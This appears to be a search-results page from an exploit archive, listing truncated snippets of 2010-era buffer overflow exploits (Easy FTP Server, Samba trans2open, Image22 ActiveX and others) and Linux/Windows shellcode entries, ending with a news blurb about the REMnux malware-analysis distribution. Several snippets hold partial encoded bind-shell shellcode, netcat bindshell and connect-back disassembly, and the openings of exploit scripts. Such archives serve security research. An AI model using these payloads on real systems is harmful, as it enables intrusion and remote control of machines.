7260 matches found
ZipCentral - .zip Local Buffer Overflow (SEH)
ZipCentral - .zip Local Buffer Overflow SEH Author : Jiten Pathy July 21 2010 Thanks to the http://en.wikipedia.org/wiki/PKZIP page for helping me understand zip file format Thanks to corelanc0d3r for shedding light on these type of exploits at...
EasyFTP Server 1.7.0.11 - CWD (Authenticated) Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - CWD Authenticated Remote Buffer Overflow Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit Post Auth Date: 2010-07-18 Author: @fdiskyou e-mail: rui at deniable.org Software Link: Version: 1.7.0.11 Tested on: Windows XP SP3 en import sock...
Ghostscript - '.PostScript' File Stack Overflow
Check Point Software Technologies - Vulnerability Discovery Team VDT Rodrigo Rubira Branco - GhostScript Stack Overflow bsd/x86/shellbindtcp - 214 bytes http://www.metasploit.com Encoder: x86/alphaupper AppendExit=false, PrependSetresuid=false, PrependSetuid=false, LPORT=4444, RHOST=,...
Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit
Exploit for windows platform in category remote exploits ================================================================================= Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit Post Auth...
Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit
Exploit for windows platform in category remote exploits ================================================================================ Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit Post Auth ================================================================================...
EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow
!/usr/bin/python import socket,sys Tested on XP Pro SP2 Eng and XP Pro SP3 Eng print """ Easy FTP Server v1.7.0.11 MKD Remote BoF Exploit Post Authentication Author / Discovered by : Karn Ganeshen Date : July 5, 2010 KarnGaneshen aT gmail d0t com http://ipositivesecurity.blogspot.com """ if...
Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow
Exploit for windows platform in category local exploits ============================================================================ Mini-Stream RM-MP3 Converter v3.1.2.1 .pls Stack Buffer Overflow universal ============================================================================ Mini-Stream...
linux/x86 standard system beep polymorphic shellcode 87 bytes
Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 standard system beep polymorphic shellcode 87 bytes ============================================================= /...
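FathFTP ActiveX Control GetFromURL and RasIsConnected Call Stack Overflow Vulnerability
CVE ID: CVE-2010-2701 FathFTP is an FTP client and FTP server ActiveX/COM component for use by Windows developers. The FathFTP ActiveX control does not properly validate the input parameters passed to the GetFromURL or RasIsConnected methods; a user who is tricked into visiting a malicious web page that passes an overlong parameter to these methods can trigger a stack overflow, leading to arbitrary code execution. FathFTP ActiveX 1.7 Workaround: set the kill bit for clsid 62A989CE-D39A-11D5-86F0-B9C370762176. Vendor patch: Fath Software -------------...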
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)
$Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...
Image22 1.1.1 Buffer Overflow
' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...
linux/x86 netcat connect back port 8080 76 bytes
Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 netcat connect back port 8080 76 bytes ================================================ / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor...
linux/x86 netcat bindshell port 8080 75 bytes
Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 netcat bindshell port 8080 75 bytes ============================================= / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax...
Linux x86 netcat bindshell port 8080 - 75 bytes
Linux x86 netcat bindshell port 8080 - 75 bytes. Shellcode exploit for linux platform / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 0f mov %al,0xf%esi 804806b: 88 46 19 mov %al,0x19%esi 804806e...
Linux x86 netcat connect back port 8080 - 76 bytes
Linux x86 netcat connect back port 8080 - 76 bytes. Shellcode exploit for linx86 platform / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 15 mov %al,0x15%esi 804806b: 88 46 1a mov %al,0x1a%esi...
RSP MP3 Player OCX 3.2 Buffer Overflow
' Exploit Title: RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow ' Date: July 9, 2010 ' Author: Blake ' Software Link: http://download.cnet.com/RSP-MP3-Player-OCX/3000-22064-10860503.html?tag=mncol ' Version: 3.2 ' Tested on: Windows XP SP3 / IE7 in VirtualBox ' EXITFUNC=seh CMD=calc.exe Size=338...
Image22 ActiveX 1.1.1 - Remote Buffer Overflow
Image22 ActiveX 1.1.1 - Remote Buffer Overflow ' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" &...
Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)
Windows/x86 XP SP3 English - calc.exe Shellcode 16 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF /------------------------------------------------------------------------ Title...................Windows XP SP3 EN Calc Shellcode 16 Bytes Release...
Image22 ActiveX 1.1.1 - Remote Buffer Overflow
' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...
New Linux OS REMnux Designed For Reverse Engineering Malware
A security expert has released a stripped-down Ubuntu distribution designed specifically for reverse-engineering malware. The OS, called REMnux, includes a slew of popular malware-analysis, network monitoring and memory forensics tools that comprise a very powerful environment for taking apart...